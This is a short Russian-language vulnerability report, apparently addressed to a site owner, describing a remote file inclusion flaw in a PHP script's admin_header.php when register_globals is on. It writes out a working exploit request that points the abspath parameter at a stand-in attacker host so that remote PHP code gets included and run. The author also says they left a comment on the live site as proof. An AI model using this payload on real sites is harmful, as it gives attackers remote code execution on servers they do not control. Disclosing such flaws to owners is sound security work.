Здравствуйте.
При инсталяции необходимо что-бы в PHP.ini были отключены
register_global=off
Иначе возникает серьезная брешь в безопасности.
так, например, появляется возможность выполнить произвольный PHP code переписав пути к заголовочным файлам
Example:
In file admin_header.php
--------------------cut----------------------
$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";
require $abspath."/db/$database.php";
$version = "1.5 RC2";
------------------cut--------------------------
просто делаем запрос типа
http://mp.webscript.ru/admin_header.php?abspath=http://haker.site/и при исполнение скрипта будет сделана попытка подключить
файл
http://haker.site/functions.php, что приведет к исполнению чужого PHP кода.
admin_header.php - это не единственный файл с подобными путями, есть и др. ну это уже не моя забота.
Как доказательство я оставил свой комментарий на главной страничке
С уважением @ROFL
